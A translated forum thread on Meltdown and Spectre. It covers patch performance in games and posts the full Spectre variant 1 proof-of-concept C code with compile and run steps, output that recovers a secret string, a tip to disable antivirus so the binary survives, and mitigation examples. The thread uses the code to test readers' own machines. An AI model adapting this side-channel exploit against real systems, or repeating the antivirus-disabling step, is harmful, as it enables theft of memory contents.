
Meltdown / Spectre



That said, five of the six tests here can push a quad-core, four-thread Intel CPU to full 100 per cent utilisation (the exception being Far Cry Primal, which relies heavily on single core power), but there is more leeway with the six-core i5 8400. What we found is that even with both patches in place, some games show no real difference at all - Ashes of the Singularity's punishing CPU benchmark remains completely consistent across all three of our test runs, as does our Notre Dame run through Assassin's Creed Unity, where any difference vanishes into the margin of error. The CPU-heavy Crysis 3 sails through the Meltdown test with no appreciable hit to performance, with the Spectre microcode update only hitting performance by two per cent. Far Cry Primal? Deduct 1fps for each of the security upgrades you install.

The Meltdown patch caused a 3.6 per cent hit to our test run through Rise of the Tomb Raider's Geothermal Valley, rising to 4.2 per cent with the BIOS update installed. However, our Witcher 3 test run - which hits storage hard and thrives on memory bandwidth - is hit comparatively hard, losing 8.2 per cent of its performance, rising to 9.4 per cent with the Spectre-orientated BIOS microcode update.

The good news is that performance is holding up: our tests here artificially push CPU performance to the forefront in a world where the GPU is the primary limiting factor in gaming. And even here, only one game sees an appreciable hit to performance and even that is in one part of a very well-optimised game that we've specifically chosen for CPU stress-testing. Most of The Witcher 3 plays much more smoothly

http://www.eurogamer.net/articles/d...-cpu-security-flaws-impact-gaming-performance
 
Will there be a performance difference in rendering and similar work programs (the Adobe suite and architecture programs)?
I'm specifically interested in the 7700K.
 
All of that goes out the window when you look at something like this:

miko.jpg
 
Is that on a machine that has been "patched" with the microcode and the MS update? Intel or AMD?
 
This is Spectre.

The picture shows Windows 10 in a VM, on some MacBook machine with an i5, running macOS High Sierra 10.13.2 Supplemental Update, which came out a day or two ago.

The author tried it on the same machine under Linux, Windows and macOS; the result is the same.
 
So they haven't patched it?
 
I think the question isn't whether they have patched it or not, but whether it can be patched at all, judging by everything.

If you like, we can have a bit of fun in this thread. :D

Compiling some source that works right away, and so on. :D

Should I also write instructions for everything, so you can try it on your own machines?

I can also upload already compiled binaries, but it's entirely up to you whether you trust precompiled ones or not.

Should I upload them or not?
 
As things stand, it was all for nothing :(
 
I've tried that Spectre code too. With the gcc compiler and the command gcc -std=c99 -O0 spectre.c -o spectre and then /spectre.exe.
This is how it looks on this AMD machine of mine with W7. Mainly I'd point out that you may have to turn off your AV, because for me 360 TS deletes spectre.exe the moment it is created.
Default CACHE_HIT_THRESHOLD (80)
amd threshold 80 default.jpg
And this second one is when CACHE_HIT_THRESHOLD is increased to 100, and then it guesses everything. So the code needs a bit of tuning.
amd threshold 100.jpg

EDIT: Oh yes, I forgot to point out that I have no patches installed. And that isn't even possible, because MS pulled the patches for AMD since Windows crashes after patching.
 
OK, I see there are people interested. So, let's get to work. :D

As can be seen in the picture above, we need (some) GCC for Windows.

I used TDM-GCC, which you can find here:

https://sourceforge.net/projects/tdm-gcc/

During installation you can accept everything that is recommended, and it will end up in the folder C:\TDM-GCC-64.

That is the folder I chose to work in; you can use any other.

Create a new text file in it. Right click -> New -> Text Document.

Open it and copy the following content into it:

Code:
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

/********************************************************************
Victim code.
********************************************************************/
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };
uint8_t unused2[64];
uint8_t array2[256 * 512];

char * secret = "The Magic Words are Squeamish Ossifrage.";

unsigned int edx = 0;

uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */

void victim_function(size_t x) {
  if (x < array1_size) {
    temp &= array2[array1[x] * 512];
  }
}

/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD (150) /* assume cache hit if time <= threshold */

int check_rdtscp() {
  __asm__ __volatile__ (
  "movl $0x80000001, %%eax\n"
  "cpuid\n"
  : "=d"(edx)
  :: "%eax", "%ebx", "%ecx"
  );
  return (edx&(1<<27));
}

/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2], int has_rdtscp) {
  static int results[256];
  int tries, i, j, k, mix_i;
  unsigned int junk = 0;
  size_t training_x, x;
  register uint64_t time1, time2;
  volatile uint8_t * addr;
  volatile int z = 0;

  for (i = 0; i < 256; i++)
    results[i] = 0;
  for (tries = 999; tries > 0; tries--) {

    /* Flush array2[256*(0..255)] from cache */
    for (i = 0; i < 256; i++)
      _mm_clflush( & array2[i * 512]); /* intrinsic for clflush instruction */

    /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
    training_x = tries % array1_size;
    for (j = 29; j >= 0; j--) {
      _mm_clflush( & array1_size);
      for (z = 0; z < 100; z++) {} /* Delay (can also mfence) */

      /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
      /* Avoid jumps in case those tip off the branch predictor */
      x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
      x = (x | (x >> 16)); /* Set x=-1 if j%6==0, else x=0 */
      x = training_x ^ (x & (malicious_x ^ training_x));

      /* Call the victim! */
      victim_function(x);

    }

    /* Time reads. Order is lightly mixed up to prevent stride prediction */
    for (i = 0; i < 256; i++) {
      mix_i = ((i * 167) + 13) & 255;
      addr = & array2[mix_i * 512];
      if (has_rdtscp) {
        time1 = __rdtscp(& junk); /* READ TIMER */
        junk = * addr; /* MEMORY ACCESS TO TIME */
        time2 = __rdtscp(& junk); /* READ TIMER & COMPUTE ELAPSED TIME */
      } else {
        time1 = __rdtsc(); /* READ TIMER */
        junk = * addr; /* MEMORY ACCESS TO TIME */
        time2 = __rdtsc(); /* READ TIMER & COMPUTE ELAPSED TIME */
      }
      if (time2 - time1 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
        results[mix_i]++; /* cache hit - add +1 to score for this value */
    }

    /* Locate highest & second-highest results tallies in j/k */
    j = k = -1;
    for (i = 0; i < 256; i++) {
      if (j < 0 || results[i] >= results[j]) {
        k = j;
        j = i;
      } else if (k < 0 || results[i] >= results[k]) {
        k = i;
      }
    }
    if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
      break; /* Clear success if best is > 2*runner-up + 5 or 2/0 */
  }
  results[0] ^= junk; /* use junk so code above won’t get optimized out*/
  value[0] = (uint8_t) j;
  score[0] = results[j];
  value[1] = (uint8_t) k;
  score[1] = results[k];
}

int main(int argc, const char * * argv) {
  size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
  int i, score[2], len = 40;
  uint8_t value[2], normalized[1];
  char * recovered = (char*)calloc(len + 1, sizeof(char*));
  const int has_rdtscp = check_rdtscp();

  for (i = 0; i < sizeof(array2); i++)
    array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
  if (argc == 3) {
    sscanf(argv[1], "%p", (void * * )( & malicious_x));
    malicious_x -= (size_t) array1; /* Convert input value into a pointer */
    sscanf(argv[2], "%d", & len);
  }

  printf("Reading %d bytes:\n", len);
  while (--len >= 0) {
    printf("Reading at malicious_x = %p... ", (void * ) malicious_x);
    readMemoryByte(malicious_x++, value, score, has_rdtscp);
    printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
    normalized[0] = (value[0] > 31 && value[0] < 127) ? value[0] : (uint8_t)'?';
    recovered[strlen(recovered)] = normalized[0];
    printf("0x%02X=\'%c\' score=%d ", value[0], normalized[0], score[0]);
    if (score[1] > 0)
      printf("(second best: 0x%02X score=%d)", value[1], score[1]);
    printf("\n");
  }
  printf("\n");
  printf(" Original: %s\n", secret);
  printf("Recovered: %s\n", recovered);
  printf("\n");
  return (0);
}
Save it and rename the file to spectre.c.

Now we need CMD. Press and hold the left Shift and right-click at the same time. You will get the option "Open command windows here". Or simply open CMD and navigate to your working folder.

Compile spectre.c with:

Code:
gcc -s -msse2 spectre.c -o spectre

or

Code:
gcc spectre.c -o spectre

If you want the x86 version, i.e. the 32-bit version, add the parameter:

Code:
-m32

You will get spectre.exe in the folder.

Run spectre.exe in the already open CMD with:

Code:
spectre

or:

Code:
spectre.exe

Report your result.

There is one more source, but I'll post that one if the one posted here doesn't work for someone.

The author of the source notes that TDM-GCC is a bit buggy, so if you think there is something better, feel free to recommend it.

Try it on Linux, macOS, Windows...
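
For contrast with the victim_function() in the post above, this added example (not part of the original post or of the demo author's code) shows two common software hardenings for that bounds-checked load: branchless index masking and an LFENCE barrier. The names index_mask_nospec, clamp_index, victim_function_masked, victim_function_fenced and SPECULATION_BARRIER are assumptions made for this example.

```c
#include <stdio.h>
#include <stddef.h>
#include <stdint.h>
#if defined(__x86_64__) || defined(__i386__) || defined(_M_X64) || defined(_M_IX86)
#include <emmintrin.h> /* _mm_lfence (SSE2) */
#define SPECULATION_BARRIER() _mm_lfence()
#else
#define SPECULATION_BARRIER() ((void)0) /* placeholder on non-x86 builds */
#endif

/* Same arrays as the victim code in the post above. */
static unsigned int array1_size = 16;
static uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };
static uint8_t array2[256 * 512];
static uint8_t temp = 0;

/* Hypothetical helper: all-ones if index < size, else 0, with no branch for
   the predictor to get wrong. Assumes size <= INTPTR_MAX and an arithmetic
   right shift of negative values (GCC, Clang and MSVC all do this). */
static size_t index_mask_nospec(size_t index, size_t size) {
  intptr_t in_range = ~(intptr_t)(index | (size - 1 - index));
  return (size_t)(in_range >> (sizeof(intptr_t) * 8 - 1));
}

/* Hypothetical helper: in-bounds x is unchanged, anything else becomes 0. */
static size_t clamp_index(size_t x, size_t size) {
  return x & index_mask_nospec(x, size);
}

/* Variant A: the mask is a data dependency, so even when the branch is
   mis-speculated with x >= array1_size the load reads array1[0], not the
   out-of-bounds byte. */
uint8_t victim_function_masked(size_t x) {
  if (x < array1_size) {
    x = clamp_index(x, array1_size);
    temp &= array2[array1[x] * 512];
  }
  return temp;
}

/* Variant B: LFENCE holds back the loads until the bounds check has
   resolved (on AMD this relies on LFENCE being dispatch-serializing). */
uint8_t victim_function_fenced(size_t x) {
  if (x < array1_size) {
    SPECULATION_BARRIER();
    temp &= array2[array1[x] * 512];
  }
  return temp;
}

int main(void) {
  size_t probes[] = { 0, 15, 16, 4080, (size_t)-1 }; /* constructed inputs */
  for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
    victim_function_masked(probes[i]);
    victim_function_fenced(probes[i]);
    printf("x=%zu -> clamped index %zu\n", probes[i],
           clamp_index(probes[i], array1_size));
  }
  return 0;
}
```

Masking costs a few ALU instructions per access and needs no fence; the LFENCE variant is simpler to audit but stalls the pipeline on every call.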
 
And an important thing: it wouldn't work for me with gcc until the following corrections were made
added a space
CACHE_HIT_THRESHOLD(80)
CACHE_HIT_THRESHOLD (80)
and replaced
(value[0] > 31 && value[0] < 127 ? value[0] : "?"), score[0])
(value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0])
I used MinGW
 
Yes.

But even so, that source still doesn't give you what's readable to us, namely letters. :D Although the hex result is the same, which is what matters most.

Try the one above that I posted. ;)
 
I tried it too, on Fedora 27 with the 4.14.11 kernel, which fixes this, but the problem still exists.
 
Yes.

But even so, that source still doesn't give you what's readable to us, namely letters. :D Although the hex result is the same, which is what matters most.

Try the one above that I posted. ;)

And what is it supposed to say there, or what does it say in hex?
 
Yes.

But even so, that source still doesn't give you what's readable to us, namely letters. :D Although the hex result is the same, which is what matters most.

Try the one above that I posted. ;)

The letters are visible, just look in the middle (the 4th symbol); there are hieroglyphs around them, so it seems as if they aren't there. In the first picture they are all ? in the middle. So the only problem is that it doesn't display the brackets properly :-devil-:

And what is it supposed to say there, or what does it say in hex?

The Magic Words are Squeamish Ossifrage.
 
I get it, but what is it actually supposed to say, why is everyone afraid of Spectre, and is your CPU loaded, and how much, while this runs?
 
That's done in a second. The point is that if this little program manages to guess all the letters, i.e. the whole sentence, then the Spectre vulnerability still exists.
As for what that is, there is plenty on it right at the start of the thread.
 
The letters are visible, just look in the middle (the 4th symbol); there are hieroglyphs around them, so it seems as if they aren't there.

Oh, really. :d

I'm laughing and crying; I wouldn't have noticed it for the life of me. :d

In any case, the one posted here is much easier to read, so there are no such catches. :)

And what is it supposed to say there, or what does it say in hex?

This is what's meant, in bold and underlined:

Reading 40 bytes:
Reading at malicious_x = 0000000000000FF0... Success: 0x54='T' score=2
Reading at malicious_x = 0000000000000FF1... Success: 0x68='h' score=2
Reading at malicious_x = 0000000000000FF2... Success: 0x65='e' score=2
Reading at malicious_x = 0000000000000FF3... Success: 0x20=' ' score=2
Reading at malicious_x = 0000000000000FF4... Success: 0x4D='M' score=2
Reading at malicious_x = 0000000000000FF5... Success: 0x61='a' score=2
Reading at malicious_x = 0000000000000FF6... Success: 0x67='g' score=2
Reading at malicious_x = 0000000000000FF7... Success: 0x69='i' score=2
Reading at malicious_x = 0000000000000FF8... Success: 0x63='c' score=2
Reading at malicious_x = 0000000000000FF9... Success: 0x20=' ' score=2
Reading at malicious_x = 0000000000000FFA... Success: 0x57='W' score=2
Reading at malicious_x = 0000000000000FFB... Success: 0x6F='o' score=2
Reading at malicious_x = 0000000000000FFC... Success: 0x72='r' score=2
Reading at malicious_x = 0000000000000FFD... Success: 0x64='d' score=2
Reading at malicious_x = 0000000000000FFE... Success: 0x73='s' score=2
Reading at malicious_x = 0000000000000FFF... Success: 0x20=' ' score=2
Reading at malicious_x = 0000000000001000... Success: 0x61='a' score=2
Reading at malicious_x = 0000000000001001... Success: 0x72='r' score=2
Reading at malicious_x = 0000000000001002... Success: 0x65='e' score=2
Reading at malicious_x = 0000000000001003... Success: 0x20=' ' score=2
Reading at malicious_x = 0000000000001004... Success: 0x53='S' score=2
Reading at malicious_x = 0000000000001005... Success: 0x71='q' score=2
Reading at malicious_x = 0000000000001006... Success: 0x75='u' score=2
Reading at malicious_x = 0000000000001007... Success: 0x65='e' score=2
Reading at malicious_x = 0000000000001008... Success: 0x61='a' score=2
Reading at malicious_x = 0000000000001009... Success: 0x6D='m' score=2
Reading at malicious_x = 000000000000100A... Success: 0x69='i' score=2
Reading at malicious_x = 000000000000100B... Success: 0x73='s' score=2
Reading at malicious_x = 000000000000100C... Success: 0x68='h' score=2
Reading at malicious_x = 000000000000100D... Success: 0x20=' ' score=2
Reading at malicious_x = 000000000000100E... Success: 0x4F='O' score=2
Reading at malicious_x = 000000000000100F... Success: 0x73='s' score=2
Reading at malicious_x = 0000000000001010... Success: 0x73='s' score=2
Reading at malicious_x = 0000000000001011... Success: 0x69='i' score=2
Reading at malicious_x = 0000000000001012... Success: 0x66='f' score=2
Reading at malicious_x = 0000000000001013... Success: 0x72='r' score=2
Reading at malicious_x = 0000000000001014... Success: 0x61='a' score=2
Reading at malicious_x = 0000000000001015... Success: 0x67='g' score=2
Reading at malicious_x = 0000000000001016... Success: 0x65='e' score=2
Reading at malicious_x = 0000000000001017... Success: 0x2E='.' score=2

Original: The Magic Words are Squeamish Ossifrage.
Recovered: The Magic Words are Squeamish Ossifrage.
 
So they haven't patched it?

The answer is:

9. Is my device protected after I’ve applied the Windows security updates Microsoft released on January 3, 2018?

To get all available protections for your device(s) against the three vulnerabilities described in this advisory, you must install the security updates for Windows and apply microcode updates provided by your hardware OEM.

If your OEM does not provide a microcode update, or if you are unable to apply it, the Windows security updates released on January 3, 2018 alone address:

CVE-2017-5753 - Bounds check bypass
CVE-2017-5754 - Rogue data cache load

To address CVE-2017-5715 - Branch target injection, you must apply a microcode update in conjunction with the Windows security update. Any questions regarding microcode updates must be directed to your OEM. Systems without updated microcode remain vulnerable to information disclosure as described in FAQ 9: What is the scope of the vulnerabilities?

https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV180002
 
OK, since we know that every processor in existence is affected by this problem, which cannot be fixed by any update or OS, we are waiting for Intel and the other manufacturers to bring into the world a new generation of CPUs that will supposedly be immune to these problems, along with the line: this is our new secure product, with it you are protected and safe, you can throw the old ones away because they aren't secure, and you can get the new ones for only $999.99.
 
-1
I use a Ryzen in my PC and an A-53 in my phone. So I'm not much affected, and where I am, the problem can be solved without major problems (losses). In other words, there's no need for me to change anything, at least as far as security is concerned :D All I need to do is wait for the update, and considering whose products I use (openSUSE, Nokia, MS), it will certainly arrive
 
-1
I use a Ryzen in my PC and an A-53 in my phone. So I'm not much affected, and where I am, the problem can be solved without major problems (losses). In other words, there's no need for me to change anything, at least as far as security is concerned :D All I need to do is wait for the update, and considering whose products I use (openSUSE, Nokia, MS), it will certainly arrive

That you as an individual aren't affected doesn't matter at all; this isn't about you, me, or us, but about the rest of the world, about a huge market.
 
I'm not updating anything until they iron this out; it looks to me as if they are trying to push something out at any cost and mess up a lot of devices in the process; nobody knows who is aiming where with the updates, as if they have no communication with each other.
 
@mirza82

Millions of individuals had the chance to choose what to buy, just like me :D I don't know how I managed to have everything I bought in the last 4 years (2 CPUs and 2 phones) be more secure than 90% of devices. So you who are affected don't have to buy new either, you can buy old :D

Just kidding; of course nobody knows where holes will be discovered, but when the only thing users care about is the cinebench or geekbench score, then companies will build processors so that this score is the priority.

Let's not kid ourselves: when Skylake came out, it was "Intel has been spoon-feeding us everything since Sandy Bridge". And now that Skylake has fared considerably better than SB and Haswell with these patches, nobody says "Intel did make something useful after all"

And after everything (Intel ME, Spectre/Meltdown, Intel AMT...), the vast majority will still consider Intel the better choice because it has 10% higher FPS when you hitch up a GTX 1080Ti at 1080p. Which is OK, but then don't let it be: "They're doing this to us on purpose".

I'm not saying an alternative product will be better from a security standpoint, but if we as buyers show that this matters more to us than a meaningless CPU-Z test, then all manufacturers will take it a bit more seriously. Of course, no CPU will ever be 100% secure, but if we don't care about security, why would they spend more resources than they have to

The only problem is that the nature of Meltdown is such that you simply don't do that. You don't build a CPU to work that way. And if you do, it's only a matter of days before it comes to light.

What AMD didn’t spell out in detail is a minor difference in microarchitecture between Intel and AMD CPUs. When a CPU speculatively executes and crosses a privilege level boundary, any i*d*i*o*t would probably say that the CPU should see this crossing and not execute the following instructions that are out of it’s privilege level. This isn’t rocket science, just basic common sense.

As for all companies, so for Intel too, it paid off. Paid off in the sense that whatever damage comes later, it will be well below the profit.

If it had been known, it would have leaked to the public at least 10 years earlier.

Someone even wrote a book about the P4. :D

 
This is a thread about the flaws, their consequences, how to patch them and a bit about how to test them, not about conspiracy theories and who knew what and when. Whoever wants to deal in conspiracy theories can move to some other forum.
 